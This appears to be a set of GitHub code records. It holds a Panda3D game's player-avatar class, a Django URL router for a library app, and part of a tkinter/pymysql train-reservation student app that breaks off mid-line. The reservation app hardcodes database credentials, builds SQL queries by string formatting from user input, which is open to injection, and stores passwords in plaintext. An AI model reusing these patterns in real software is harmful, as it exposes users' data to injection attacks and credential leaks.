DistributedPlayerToonShared.__init__(self)\n self.role = None\n self.ghost = 0\n self.puInventory = []\n self.equippedPU = -1\n self.backpack = Backpack(self)\n self.battleMeter = None\n self.headMeter = None\n self.firstTimeChangingHP = True\n \n # Quest-related variables.\n self.quests = \"\"\n self.tier = None\n self.questHistory = None\n \n self.busy = 1\n self.friends = None\n self.tutDone = 0\n self.hoodsDiscovered = []\n self.teleportAccess = []\n self.lastHood = 0\n self.defaultShard = 0\n self.tunnelTrack = None\n self.trackExperience = dict(GagGlobals.DefaultTrackExperiences)\n \n self.takeDmgSfx = base.audio3d.loadSfx('phase_5/audio/sfx/tt_s_ara_cfg_toonHit.ogg')\n base.audio3d.attachSoundToObject(self.takeDmgSfx, self)\n return\n \n def getHealth(self):\n return DistributedPlayerToonShared.getHealth(self)\n \n def getMaxHealth(self):\n return DistributedPlayerToonShared.getMaxHealth(self)\n \n def stopSmooth(self):\n DistributedToon.stopSmooth(self)\n localAvatarReachable = (hasattr(base, 'localAvatar') and base.localAvatar)\n if localAvatarReachable and self.doId != base.localAvatar.doId:\n self.resetTorsoRotation()\n\n def handleHealthChange(self, hp, oldHp):\n if hp < oldHp and not self.firstTimeChangingHP:\n # We took damage, make oof sound.\n self.takeDmgSfx.play()\n\n def setHealth(self, health):\n self.handleHealthChange(health, self.getHealth())\n DistributedToon.setHealth(self, health)\n if self.doId != base.localAvatar.doId:\n if not self.firstTimeChangingHP:\n if health < self.getMaxHealth():\n if not self.headMeter:\n self.__makeHeadMeter()\n else:\n self.__updateHeadMeter()\n else:\n self.__removeHeadMeter()\n self.firstTimeChangingHP = False\n\n def announceHealthAndPlaySound(self, level, hp, extraId = -1):\n DistributedToon.announceHealth(self, level, hp, extraId)\n hpSfx = base.audio3d.loadSfx('phase_11/audio/sfx/LB_toonup.ogg')\n base.audio3d.attachSoundToObject(hpSfx, self)\n SoundInterval(hpSfx, node = self).start()\n del hpSfx\n \n def setChat(self, chat):\n chat = ChatGlobals.filterChat(chat, self.animal)\n DistributedToon.setChat(self, chat)\n \n def goThroughTunnel(self, toZone, inOrOut, requestStatus = None):\n # inOrOut: 0 = in; 1 = out\n\n if self.tunnelTrack:\n self.ignore(self.tunnelTrack.getDoneEvent())\n self.tunnelTrack.finish()\n self.tunnelTrack = None\n\n linkTunnel = LinkTunnel.getTunnelThatGoesToZone(toZone)\n if not linkTunnel:\n return\n self.tunnelTrack = 
Parallel(name = self.uniqueName('Place.goThroughTunnel'))\n\n if inOrOut == 0:\n # Going in a tunnel!\n pivotPoint = linkTunnel.inPivotPoint\n pivotPointNode = linkTunnel.tunnel.attachNewNode('tunnelPivotPoint')\n pivotPointNode.setPos(pivotPoint)\n pivotPointNode.setHpr(linkTunnel.inPivotStartHpr)\n \n x, y, z = self.getPos(render)\n surfZ = PhysicsUtils.getNearestGroundSurfaceZ(self, self.getHeight() + self.getHeight() / 2.0)\n \n if not surfZ == -1:\n # Let's use the ray-tested surface z-point instead so we don't come out of the tunnel hovering.\n # This is just in case the user jumped into the tunnel, which in that case would mean that they are\n # airborne and we can't depend on their current Z value.\n z = surfZ\n \n if base.localAvatar.doId == self.doId:\n doneMethod = self._handleWentInTunnel\n extraArgs = [requestStatus]\n base.localAvatar.walkControls.setCollisionsActive(0, andPlaceOnGround=1)\n self.resetHeadHpr(override = True)\n camera.wrtReparentTo(linkTunnel.tunnel)\n currCamPos = camera.getPos()\n currCamHpr = camera.getHpr()\n tunnelCamPos = linkTunnel.camPos\n tunnelCamHpr = linkTunnel.camHpr\n camera.setPos(tunnelCamPos)\n camera.setHpr(tunnelCamHpr)\n self.tunnelTrack.append(LerpPosInterval(\n camera,\n duration = 0.7,\n pos = tunnelCamPos,\n startPos = currCamPos,\n blendType = 'easeOut'\n ))\n self.tunnelTrack.append(LerpQuatInterval(\n camera,\n duration = 0.7,\n quat = tunnelCamHpr,\n startHpr = currCamHpr,\n blendType = 'easeOut'\n ))\n\n self.wrtReparentTo(pivotPointNode)\n self.setPos(x, y, z)\n self.resetTorsoRotation()\n self.stopLookAround()\n \n if linkTunnel.__class__.__name__ == \"SafeZoneLinkTunnel\":\n self.setHpr(180, 0, 0)\n else:\n self.setHpr(0, 0, 0)\n \n exitSeq = Sequence(Func(self.loop, 'run'))\n if base.localAvatar.doId == self.doId:\n exitSeq.append(Wait(2.0))\n exitSeq.append(Func(base.transitions.irisOut))\n self.tunnelTrack.append(exitSeq)\n self.tunnelTrack.append(Sequence(\n LerpHprInterval(\n pivotPointNode,\n duration = 2.0,\n hpr = linkTunnel.inPivotEndHpr,\n startHpr = linkTunnel.inPivotStartHpr,\n ), LerpPosInterval(\n pivotPointNode,\n duration = 1.0,\n pos = (linkTunnel.inPivotEndX, pivotPointNode.getY(), pivotPointNode.getZ()),\n startPos = (linkTunnel.inPivotStartX, pivotPointNode.getY(), pivotPointNode.getZ())\n ), Func(self.reparentTo, hidden)))\n elif inOrOut == 1:\n \n # Going out!\n pivotPoint = linkTunnel.outPivotPoint\n pivotPointNode = linkTunnel.tunnel.attachNewNode('tunnelPivotPoint')\n pivotPointNode.setPos(pivotPoint)\n pivotPointNode.setHpr(linkTunnel.outPivotStartHpr)\n \n exitSeq = Sequence()\n \n if base.localAvatar.doId == self.doId:\n base.localAvatar.walkControls.setCollisionsActive(0, andPlaceOnGround=1)\n base.localAvatar.detachCamera()\n camera.reparentTo(linkTunnel.tunnel)\n tunnelCamPos = linkTunnel.camPos\n tunnelCamHpr = linkTunnel.camHpr\n camera.setPos(tunnelCamPos)\n camera.setHpr(tunnelCamHpr)\n doneMethod = self._handleCameOutTunnel\n extraArgs = []\n \n exitSeq.append(Func(base.transitions.irisIn))\n else:\n self.stopSmooth()\n \n self.reparentTo(pivotPointNode)\n self.setHpr(linkTunnel.toonOutHpr)\n self.setPos(linkTunnel.toonOutPos)\n \n seq = Sequence(\n Func(self.loop, 'run'),\n LerpPosInterval(\n pivotPointNode,\n duration = 1.0,\n pos = (linkTunnel.outPivotEndX, pivotPointNode.getY(), pivotPointNode.getZ()),\n startPos = (linkTunnel.outPivotStartX, pivotPointNode.getY(), pivotPointNode.getZ())\n ),\n LerpHprInterval(\n pivotPointNode,\n duration = 2.0,\n hpr = linkTunnel.outPivotEndHpr,\n 
startHpr = linkTunnel.outPivotStartHpr,\n )\n )\n if base.localAvatar.doId != self.doId:\n seq.append(Func(self.startSmooth))\n seq.append(Func(self.wrtReparentTo, render))\n exitSeq.append(seq)\n self.tunnelTrack.append(exitSeq)\n\n if base.localAvatar.doId == self.doId:\n self.tunnelTrack.setDoneEvent(self.tunnelTrack.getName())\n self.acceptOnce(self.tunnelTrack.getDoneEvent(), doneMethod, extraArgs)\n\n self.tunnelTrack.start()\n \n def setDefaultShard(self, shardId):\n self.defaultShard = shardId\n\n def getDefaultShard(self):\n return self.defaultShard\n\n def setLastHood(self, zoneId):\n self.lastHood = zoneId\n\n def b_setLastHood(self, zoneId):\n self.sendUpdate('setLastHood', [zoneId])\n self.setLastHood(zoneId)\n\n def getLastHood(self):\n return self.lastHood\n\n def setTeleportAccess(self, array):\n self.teleportAccess = array\n\n def getTeleportAccess(self):\n return self.teleportAccess\n\n def setHoodsDiscovered(self, array):\n self.hoodsDiscovered = array\n\n def b_setHoodsDiscovered(self, array):\n self.sendUpdate('setHoodsDiscovered', [array])\n self.setHoodsDiscovered(array)\n\n def getHoodsDiscovered(self):\n return self.hoodsDiscovered\n\n def setTutorialCompleted(self, value):\n self.tutDone = value\n\n def getTutorialCompleted(self):\n return self.tutDone\n\n def setFriendsList(self, friends):\n self.friends = friends\n\n def getFriendsList(self):\n return self.friends\n\n def setBusy(self, busy):\n self.busy = busy\n\n def getBusy(self):\n return self.busy\n\n def setTier(self, tier):\n self.tier = tier\n\n def getTier(self):\n return self.tier\n\n def setQuestHistory(self, array):\n self.questHistory = array\n\n def getQuestHistory(self):\n return self.questHistory\n\n def setQuests(self, dataStr):\n self.quests = dataStr\n\n def getQuests(self):\n return self.quests\n\n def maybeMakeHeadMeter(self):\n if base.localAvatar.doId != self.doId:\n if self.getHealth() < self.getMaxHealth():\n if not self.headMeter:\n self.__makeHeadMeter()\n\n def __makeHeadMeter(self):\n self.headMeter = LaffOMeter(forRender = True)\n r, g, b, _ = self.getHeadColor()\n animal = self.getAnimal()\n maxHp = self.getMaxHealth()\n hp = self.getHealth()\n self.headMeter.generate(r, g, b, animal, maxHP = maxHp, initialHP = hp)\n self.headMeter.reparentTo(self)\n self.headMeter.setZ(self.getHeight() + 2)\n self.headMeter.setScale(0.4)\n self.headMeter.setBillboardAxis()\n self.__updateHeadMeter()\n\n def __removeHeadMeter(self):\n if self.headMeter:\n self.headMeter.disable()\n self.headMeter.delete()\n self.headMeter = None\n\n def __updateHeadMeter(self):\n if self.headMeter:\n self.headMeter.updateMeter(self.getHealth())\n \n def d_createBattleMeter(self):\n self.sendUpdate('makeBattleMeter', [])\n\n def b_createBattleMeter(self):\n self.makeBattleMeter()\n self.d_createBattleMeter()\n\n def d_cleanupBattleMeter(self):\n self.sendUpdate('destroyBattleMeter', [])\n\n def b_cleanupBattleMeter(self):\n self.destroyBattleMeter()\n self.d_cleanupBattleMeter()\n\n def makeBattleMeter(self):\n if self.getHealth() < self.getMaxHealth():\n if not self.battleMeter:\n self.battleMeter = LaffOMeter()\n r, g, b, _ = self.getHeadColor()\n animal = self.getAnimal()\n maxHp = self.getMaxHealth()\n hp = self.getHealth()\n self.battleMeter.generate(r, g, b, animal, maxHP = maxHp, initialHP = hp)\n self.battleMeter.reparentTo(self)\n self.battleMeter.setZ(self.getHeight() + 5)\n self.battleMeter.setScale(0.5)\n self.battleMeter.start()\n\n def destroyBattleMeter(self):\n if self.battleMeter:\n 
self.battleMeter.stop()\n self.battleMeter.disable()\n self.battleMeter.delete()\n self.battleMeter = None\n\n def setEquippedPU(self, index):\n self.equippedPU = index\n\n def getEquippedPU(self):\n return self.equippedPU\n\n def setPUInventory(self, array):\n self.puInventory = array\n\n def getPUInventory(self):\n return self.puInventory\n\n def setGhost(self, value):\n self.ghost = value\n self.handleGhost(value)\n\n def d_setGhost(self, value):\n self.sendUpdate(\"setGhost\", [value])\n\n def b_setGhost(self, value):\n self.d_setGhost(value)\n self.setGhost(value)\n\n def getGhost(self):\n return self.ghost\n\n def getBackpack(self):\n return self.backpack\n\n def setEquippedAttack(self, attackID):\n try: \n self.backpack.setCurrentGag(attackID) \n except:\n # If we couldn't do this, it means that the avatar was most likely disabled. \n pass\n DistributedToon.setEquippedAttack(self, attackID)\n\n def getCurrentGag(self):\n return self.getEquippedAttack()\n\n def setLoadout(self, gagIds):\n if self.backpack:\n loadout = []\n for i in range(len(gagIds)):\n gagId = gagIds[i]\n gag = self.backpack.getGagByID(gagId)\n if gag:\n loadout.append(gag)\n self.backpack.setLoadout(loadout)\n \n def setBackpackAmmo(self, netString):\n if len(self.attackIds) != 0 or len(self.attacks) != 0:\n self.cleanupAttacks()\n self.clearAttackIds()\n return self.backpack.updateSuppliesFromNetString(netString)\n \n def getBackpackAmmo(self):\n if self.backpack:\n return self.backpack.netString\n return GagGlobals.getDefaultBackpack().toNetString()\n \n def setTrackExperience(self, netString):\n self.trackExperience = GagGlobals.getTrackExperienceFromNetString(netString)\n if GagGlobals.processTrackData(self.trackExperience, self.backpack) and self == base.localAvatar:\n if base.localAvatar.invGui:\n base.localAvatar.reloadInvGui()\n \n def getTrackExperience(self):\n return GagGlobals.trackExperienceToNetString(self.trackExperience)\n\n def updateAttackAmmo(self, gagId, ammo, maxAmmo, ammo2, maxAmmo2, clip, maxClip):\n if self.useBackpack():\n self.backpack.setSupply(gagId, ammo)\n else:\n DistributedToon.updateAttackAmmo(self, gagId, ammo, maxAmmo, ammo2, maxAmmo2, clip, maxClip)\n\n def setMoney(self, money):\n self.money = money\n\n def getMoney(self):\n return self.money\n\n def setAccessLevel(self, value):\n prevLevel = self.getAccessLevel()\n self.role = AdminCommands.Roles.get(value, None)\n \n if prevLevel != AdminCommands.NoAccess:\n # Let's remove any tokens that already are showing up.\n DistributedToon.removeAdminToken(self)\n \n if self.role:\n # Let's put a new token above our head.\n DistributedToon.setAdminToken(self, self.role.token)\n\n def getAccessLevel(self):\n return AdminCommands.NoAccess if not self.role else self.role.accessLevel\n \n def disable(self):\n base.audio3d.detachSound(self.takeDmgSfx)\n self.takeDmgSfx = None\n if self.tunnelTrack:\n self.ignore(self.tunnelTrack.getDoneEvent())\n self.tunnelTrack.finish()\n self.tunnelTrack = None\n self.role = None\n self.ghost = None\n self.puInventory = None\n self.equippedPU = None\n if self.backpack:\n self.backpack.cleanup()\n self.backpack = None\n self.firstTimeChangingHP = None\n self.quests = None\n self.tier = None\n self.questHistory = None\n self.busy = None\n self.friends = None\n self.tutDone = None\n self.hoodsDiscovered = None\n self.teleportAccess = None\n self.lastHood = None\n self.defaultShard = None\n self.trackExperience = None\n self.__removeHeadMeter()\n self.destroyBattleMeter()\n DistributedToon.disable(self)\n \n 
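# disable() above is the reversible half of teardown (the distributed object may be re-generated later); delete(), below, is the permanent half, guarded by the DistributedPlayerToon_deleted flag so it runs only once.\n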
def delete(self):\n try:\n self.DistributedPlayerToon_deleted\n except AttributeError:\n # First call: set the guard flag so repeated delete() calls are no-ops.\n self.DistributedPlayerToon_deleted = 1\n DistributedPlayerToonShared.delete(self)\n del self.takeDmgSfx\n del self.tunnelTrack\n del self.role\n del self.ghost\n del self.puInventory\n del self.equippedPU\n del self.backpack\n del self.firstTimeChangingHP\n del self.quests\n del self.tier\n del self.questHistory\n del self.busy\n del self.friends\n del self.tutDone\n del self.hoodsDiscovered\n del self.teleportAccess\n del self.lastHood\n del self.defaultShard\n del self.trackExperience\n del self.battleMeter\n del self.headMeter\n DistributedToon.delete(self)\n return\n","repo_name":"Cog-Invasion-Online/cio-src","sub_path":"game/src/coginvasion/toon/DistributedPlayerToon.py","file_name":"DistributedPlayerToon.py","file_ext":"py","file_size_in_byte":18496,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"19"}
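The DistributedPlayerToon record above relies on Panda3D's distributed-setter naming convention: for a replicated field X, setX applies the value locally, d_setX broadcasts it via sendUpdate, and b_setX does both. A minimal, self-contained sketch of that convention follows; the DistributedSetterDemo class and its print-based sendUpdate stub are illustrative stand-ins, not code from the repo.

class DistributedSetterDemo:
    """Sketch of the setX / d_setX / b_setX pattern used above."""

    def __init__(self):
        self.lastHood = None

    def sendUpdate(self, fieldName, args):
        # Stub transport: the real game serializes the call and relays it
        # through the server to every interested client.
        print('sendUpdate(%r, %r)' % (fieldName, args))

    def setLastHood(self, zoneId):
        # Local setter: mutates this process only.
        self.lastHood = zoneId

    def d_setLastHood(self, zoneId):
        # Distributed setter: notifies peers, touches no local state.
        self.sendUpdate('setLastHood', [zoneId])

    def b_setLastHood(self, zoneId):
        # "Both": broadcast first, then apply locally.
        self.d_setLastHood(zoneId)
        self.setLastHood(zoneId)

demo = DistributedSetterDemo()
demo.b_setLastHood(2000)
assert demo.lastHood == 2000

Keeping the local and network halves separate is what lets an incoming update call plain setLastHood on a replica without triggering a re-broadcast, which is why b_setLastHood, b_setHoodsDiscovered, and b_setGhost above all delegate rather than duplicate.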
+{"seq_id":"26067499157","text":"from rest_framework import routers\nfrom accounts import views as accounts_views\nfrom django.conf.urls import url, include\nfrom django.urls import path\n\nrouter = routers.DefaultRouter()\nrouter.register(r'register', accounts_views.SignupViewSet, basename='register'),\nrouter.register(r'book_list', accounts_views.BookList, basename='book_list'),\nrouter.register(r'add_into_book_list', accounts_views.AddBook, basename='add_into_book_list'),\nrouter.register(r'delete_book', accounts_views.DeleteBook, basename='delete_book'),\nrouter.register(r'book_details', accounts_views.BookDetails, basename='book_details'),\nrouter.register(r'update_book_details', accounts_views.UpdateBookDetails, basename='update_book_details'),\n\nurlpatterns = [\n url(r'', include(router.urls)),\n url(r'^login', accounts_views.LoginViewSet.as_view(), name=\"login\"),\n]\n","repo_name":"prajktaraje/keywordio","sub_path":"DjangoBackend/LibraryManagementSystemBackend/rest_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"32920174625","text":"#Arthi Nithi, Anjani Agrawal, Alan Chiang, Alaap Murali\n\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter.ttk import *\nimport pymysql\nimport calendar\nimport datetime\nfrom math import *\nimport time\nclass Phase_three:\n def __init__(self,primaryWin):\n self.primaryWin = primaryWin\n self.Login()\n self.results1 = []\n self.entrys=[]\n self.newUserWindow = Toplevel()\n #self.Register()\n self.newUserWindow.title(\"New User Registration\")\n self.newUserWindow.withdraw()\n\n self.primaryWindow = Toplevel()\n self.primaryWindow.title(\"Welcome \"+self.username.get())\n self.primaryWindow.withdraw()\n\n self.schoolInfoWin= Toplevel()\n self.schoolInfoWin.title(\"Add School Info\")\n self.schoolInfoWin.withdraw()\n\n self.trainSchWin= Toplevel()\n self.trainSchWin.title(\"View Train Schedule\")\n self.trainSchWin.withdraw()\n\n self.scheduleWin= Toplevel()\n self.scheduleWin.title(\"View Train Schedule\")\n self.scheduleWin.withdraw()\n\n self.findAvailWindow= Toplevel()\n self.findAvailWindow.title(\"Search Train\")\n self.findAvailWindow.withdraw()\n\n self.departureWin = Toplevel()\n self.departureWin.title(\"Select Departure\")\n self.departureWin.withdraw()\n\n self.passengerInfoWin = Toplevel()\n self.passengerInfoWin.title(\"Travel Extras & Passenger Info\")\n self.passengerInfoWin.withdraw()\n\n self.reservationWin = Toplevel()\n self.reservationWin.title(\"Make Reservation\")\n self.reservationWin.withdraw()\n\n self.paymentIWin = Toplevel()\n self.paymentIWin.title(\"Add Card\")\n self.paymentIWin.withdraw()\n\n self.paymentIWin2 = Toplevel()\n self.paymentIWin2.title(\"Delete Card\")\n self.paymentIWin2.withdraw()\n\n self.confirm = Toplevel()\n self.confirm.title(\"Confirmation\")\n self.confirm.withdraw()\n\n self.updateWin = Toplevel()\n self.updateWin.title(\"Update Reservation\")\n self.updateWin.withdraw()\n\n self.updateWin2 = Toplevel()\n self.updateWin2.title(\"Update Reservation\")\n self.updateWin2.withdraw()\n\n self.updateWin3 = Toplevel()\n self.updateWin3.title(\"Update Reservation\")\n self.updateWin3.withdraw()\n\n self.cancelWin = Toplevel()\n self.cancelWin.title(\"Cancel Reservation\")\n self.cancelWin.withdraw()\n\n self.cancelWin2 = Toplevel()\n self.cancelWin2.title(\"Cancel Reservation\")\n self.cancelWin2.withdraw()\n\n self.viewReviewWin = Toplevel()\n self.viewReviewWin.title(\"View review\")\n self.viewReviewWin.withdraw()\n\n self.viewReviewWin2 = Toplevel()\n self.viewReviewWin2.title(\"View review\")\n self.viewReviewWin2.withdraw()\n\n self.giveReviewWin = Toplevel()\n self.giveReviewWin.title(\"Give Review\")\n self.giveReviewWin.withdraw()\n\n self.viewRevenueReport = Toplevel()\n self.viewRevenueReport.title(\"View Revenue Report\")\n self.viewRevenueReport.withdraw()\n\n self.viewpopRRWin = Toplevel()\n self.viewpopRRWin.title(\"View Popular Route Report\")\n self.viewpopRRWin.withdraw()\n\n def Connect(self):\n try:\n db = pymysql.connect(host=\"academic-mysql.cc.gatech.edu\", user=\"cs4400_Team_48\", passwd=\"dwet2rPC\",db=\"cs4400_Team_48\")\n return db\n except:\n messagebox.showerror(\"Error\", \"Check Internet Connection\")\n\n def Login(self):\n self.primaryWin.title(\"Login\")\n frame = Frame(self.primaryWin)\n frame.pack()\n frame2 = Frame(self.primaryWin)\n frame2.pack()\n\n label1 = Label(frame,text = \"Username\")\n label2 = Label(frame,text =\"Password\")\n label1.grid(row = 0, column = 0,sticky=E)\n label2.grid(row = 1, column = 0,sticky=E)\n self.username = StringVar()\n 
self.password = StringVar()\n entry1 = Entry(frame, textvariable = self.username, width = 30)\n entry1.grid(row = 0, column = 1)\n entry2 = Entry(frame, textvariable = self.password, width = 30)\n entry2.grid(row = 1, column = 1)\n\n b1=Button(frame2, text =\"Login\", command=self.loginCredentials)\n b1.pack(side=LEFT)\n b2=Button(frame2, text =\"Register\", command= self.switchToRegister)\n b2.pack(side=LEFT)\n\n def loginCredentials(self):\n if self.username.get() == \"\" or self.password.get() == \"\":\n messagebox.showerror(\"Error\", \"Invalid input\")\n return\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT Username FROM CUSTOMER \\\n WHERE (CUSTOMER.Username = '%s' AND (SELECT Password FROM USER WHERE CUSTOMER.Username = USER.Username) = '%s')\" % (self.username.get(), self.password.get())\n cursor.execute(query)\n result1 = cursor.fetchall()\n query = \"SELECT Username FROM MANAGER \\\n WHERE (MANAGER.Username = '%s' AND (SELECT Password FROM USER WHERE MANAGER.Username = USER.Username) = '%s')\" % (self.username.get(), self.password.get())\n\n cursor.execute(query)\n result2 = cursor.fetchall()\n\n if len(result1) != 0:\n self.custOrManag = \"customer\"\n for row in result1:\n self.name = row[0]\n self.switchtoMainMenu()\n elif len(result2) != 0:\n self.custOrManag = \"manager\"\n for row in result2:\n self.name = row[0]\n self.switchtoMainMenu()\n else:\n messagebox.showerror(\"Error\", \"Invalid username or password\")\n\n def mainMenu(self):\n self.primaryWindow = Toplevel()\n self.primaryWindow.title(\"Choose Functionality \")\n buttonsFrame = Frame(self.primaryWindow)\n buttonsFrame.pack()\n if self.custOrManag == \"customer\":\n b1 = Button(buttonsFrame, text =\"View Train Schedule\", command = self.trainSchedule)\n b1.grid(row = 0, column = 0, columnspan = 2, sticky = EW)\n b2 = Button(buttonsFrame, text =\"Make a new reservation\", command = self.searchTrain)\n b2.grid(row = 1, column = 0, columnspan = 2, sticky = EW)\n b3 = Button(buttonsFrame, text =\"Update a reservation\", command = self.updateReservation)\n b3.grid(row = 2, column = 0, columnspan = 2, sticky = EW)\n b4 = Button(buttonsFrame, text =\"Cancel a reservation\", command = self.cancelRes)\n b4.grid(row = 3, column = 0, columnspan = 2, sticky = EW)\n b5 = Button(buttonsFrame, text =\"Give review\", command = self.giveReview)\n b5.grid(row = 4, column = 0, columnspan = 2, sticky = EW)\n b6 = Button(buttonsFrame, text =\"Add school information (student discount)\", command = self.schoolInfo)\n b6.grid(row = 5, column = 0, columnspan = 2, sticky = EW)\n b7 = Button(buttonsFrame, text =\"Log out\", command = self.logout)\n b7.grid(row = 6, column = 0, columnspan = 2, sticky = EW)\n elif self.custOrManag == \"manager\":\n b8 = Button(buttonsFrame, text =\"View revenue report\", command = self.viewRevenueRep)\n b8.grid(row = 0, column = 0, columnspan = 2, sticky = EW)\n b9 = Button(buttonsFrame, text =\"View popular route report\", command = self.viewpopRR)\n b9.grid(row = 1, column = 0, columnspan = 2, sticky = EW)\n b10=Button(buttonsFrame, text =\"Log out\", command = self.logout)\n b10.grid(row = 2, column = 0, columnspan = 2, sticky = EW)\n\n def switchToRegister(self):\n self.primaryWin.withdraw()\n self.newUserWindow.deiconify()\n self.Register()\n #self.primaryWin.withdraw()\n\n def switchToLogin(self):\n self.newUserWindow.withdraw()\n self.primaryWin.deiconify()\n\n def switchtoMainMenu(self):\n self.primaryWin.withdraw()\n #self.primaryWindow.deiconify()\n self.mainMenu()\n\n 
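# Registration flow: require all four fields and matching passwords, reject usernames already present in USER, then insert the credentials into USER and the email into CUSTOMER before returning to the login window.\n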
def Register(self):\n self.newUserWindow.title(\"New User Registration\")\n frame=Frame(self.newUserWindow)\n frame.pack()\n frame2=Frame(self.newUserWindow)\n frame2.pack(side = BOTTOM)\n\n label1 = Label(frame,text = \"Username\", justify = LEFT)\n label1.grid(row = 0, column = 0, sticky = W)\n self.registeredUser = StringVar()\n self.uentry = Entry(frame, textvariable = self.registeredUser, width = 30, justify = RIGHT)\n self.uentry.grid(row = 0, column = 1, sticky = W)\n\n label2 = Label(frame,text =\"Email Address\", justify = LEFT)\n label2.grid(row = 1, column = 0, sticky = W)\n self.registerEmail = StringVar()\n self.email_entry = Entry(frame, textvariable = self.registerEmail, width = 30, justify = RIGHT)\n self.email_entry.grid(row = 1, column = 1, sticky = W)\n\n label3 = Label(frame,text = \"Password\", justify = LEFT)\n label3.grid(row = 2, column = 0, sticky = W)\n self.registeredPass = StringVar()\n self.password_entry = Entry(frame, textvariable = self.registeredPass, width = 30, justify = RIGHT)\n self.password_entry.grid(row = 2, column = 1, sticky = W)\n\n label4 = Label(frame,text =\"Confirm Password\", justify = LEFT)\n label4.grid(row = 3, column = 0, sticky = W)\n self.registeredPassConfirm = StringVar()\n self.confirm_password_entry = Entry(frame, textvariable = self.registeredPassConfirm, width = 30, justify = RIGHT)\n self.confirm_password_entry.grid(row = 3, column = 1, sticky = W)\n\n b_reg=Button(frame2, text =\"Create\", command = self.registerCredentials)\n b_reg.pack(side = BOTTOM)\n\n def registerCredentials(self):\n if self.registeredUser.get() == \"\" or self.registeredPass.get() == \"\" or self.registeredPassConfirm.get() == \"\" or self.registerEmail.get() == \"\":\n messagebox.showerror(\"Error\", \"Invalid input\")\n return\n\n if self.registeredPass.get() != self.registeredPassConfirm.get():\n messagebox.showerror(\"Error\", \"Passwords must match\")\n return\n\n db = self.Connect()\n cursor = db.cursor()\n query1 = \"SELECT * FROM USER \\\n WHERE USER.Username = '%s'\" % (self.registeredUser.get())\n\n cursor.execute(query1)\n result1 = cursor.fetchall()\n\n\n if len(result1) != 0:\n messagebox.showerror(\"Error\", \"Username already in use\")\n return\n\n querypatch = \"INSERT INTO USER(Username, Password) VALUES ('%s' , '%s')\" % (self.registeredUser.get(), self.registeredPass.get())\n cursor.execute(querypatch)\n result3 = cursor.fetchall()\n\n query2 = \"INSERT INTO CUSTOMER(Username, Email) \\\n VALUES ('%s', '%s')\" % (self.registeredUser.get(), self.registerEmail.get())\n cursor.execute(query2)\n result2 = cursor.fetchall()\n\n cursor.close()\n db.commit()\n db.close()\n self.switchToLogin()\n\n def schoolInfo(self):\n self.primaryWindow.destroy()\n self.schoolInfoWin = Toplevel()\n self.schoolInfoWin.title(\"Add School Info\")\n frame1 = Frame(self.schoolInfoWin)\n frame2 = Frame(self.schoolInfoWin)\n frame1.pack(side = TOP)\n frame2.pack(side = BOTTOM)\n self.emailaddress = StringVar()\n self.entry = Entry(frame1, textvariable = self.emailaddress, width = 30)\n self.entry.grid(row = 0, column = 1)\n label1 = Label(frame1,text = \"School Email Address\")\n label1.grid(row = 0, column = 0)\n label2 = Label(frame1,text = \"Your school email adress ends with .edu\")\n label2.grid(row = 1, column = 0)\n\n b1 = Button(frame2, text =\"Back\", command = self.sMAINMENU)\n b1.grid(row = 2, column = 0)\n b2 = Button(frame2, text =\"Submit\", command = self.writeToDB)\n b2.grid(row = 2, column = 1)\n\n def writeToDB(self):\n server = self.Connect()\n 
cursor = server.cursor()\n query = \"UPDATE CUSTOMER SET Email = '%s' WHERE Username = '%s'\" % (self.emailaddress.get(),self.username.get())\n cursor.execute(query)\n if self.emailaddress.get()[-4:] == \".edu\":\n query = \"UPDATE CUSTOMER SET Is_student = 1 WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query)\n server.commit()\n cursor.close()\n server.close()\n\n self.schoolInfoWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def logout(self):\n self.primaryWindow.destroy()\n self.primaryWin = Toplevel()\n self.Login()\n\n def sMAINMENU(self):\n self.schoolInfoWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def trainSchedule(self):\n self.primaryWindow.destroy()\n self.trainSchWin = Toplevel()\n self.trainSchWin.title(\"View Train Schedule\")\n frame1 = Frame(self.trainSchWin)\n frame2 = Frame(self.trainSchWin)\n frame1.pack(side = TOP)\n frame2.pack(side = BOTTOM)\n label1 = Label(frame1,text = \"Train Number\")\n label1.pack(side=LEFT)\n\n self.trainNumber = IntVar()\n self.entry = Entry(frame1, textvariable = self.trainNumber, width = 10)\n self.entry.pack(side=RIGHT)\n\n b1 = Button(frame2, text =\"Search\", command = self.schedule)\n b1.pack(side=LEFT)\n\n def getTrainTree(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\",\"arrv\",\"dept\",\"stat\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"arrv\", text= \"Arrival Time\")\n tree.heading(\"dept\", text= \"Departure Time\")\n tree.heading(\"stat\", text= \"Station\")\n return tree\n\n def schedule(self):\n self.trainSchWin.destroy()\n self.scheduleWin = Toplevel()\n self.scheduleWin.title(\"View Train Schedule\")\n\n frame1 = Frame(self.scheduleWin)\n frame1.pack()\n\n tree = self.getTrainTree(frame1)\n server = self.Connect()\n cursor = server.cursor()\n\n trainNum = self.trainNumber.get()\n query1 = \"SELECT * FROM STOP WHERE Train_Number = '%d'\" % (trainNum)\n\n cursor.execute(query1)\n results = cursor.fetchall()\n i = 0\n for result in results:\n tree.insert('', i, text='', values=(result[2], result[0],result[1], result[3]))\n i += 1\n\n b1 = Button(frame1, text =\"Back\", command = self.switchToMainMenu)\n b1.pack(side= BOTTOM)\n\n def switchToMainMenu(self):\n self.scheduleWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def searchTrain(self):\n self.primaryWindow.withdraw()\n self.findAvailWindow = Toplevel()\n\n self.findAvailWindow.title(\"Search Train\")\n frame = Frame(self.findAvailWindow)\n frame.pack(side=TOP)\n frame1=Frame(self.findAvailWindow)\n frame1.pack(side=TOP)\n frame2=Frame(self.findAvailWindow)\n frame2.pack(side=TOP)\n frame3=Frame(self.findAvailWindow)\n frame3.pack(side=TOP)\n\n location= Label(frame,text = \"Departs From\")\n location.grid(row = 0, column = 0, sticky = E)\n self.city = StringVar()\n\n server = self.Connect()\n cursor = server.cursor()\n query = 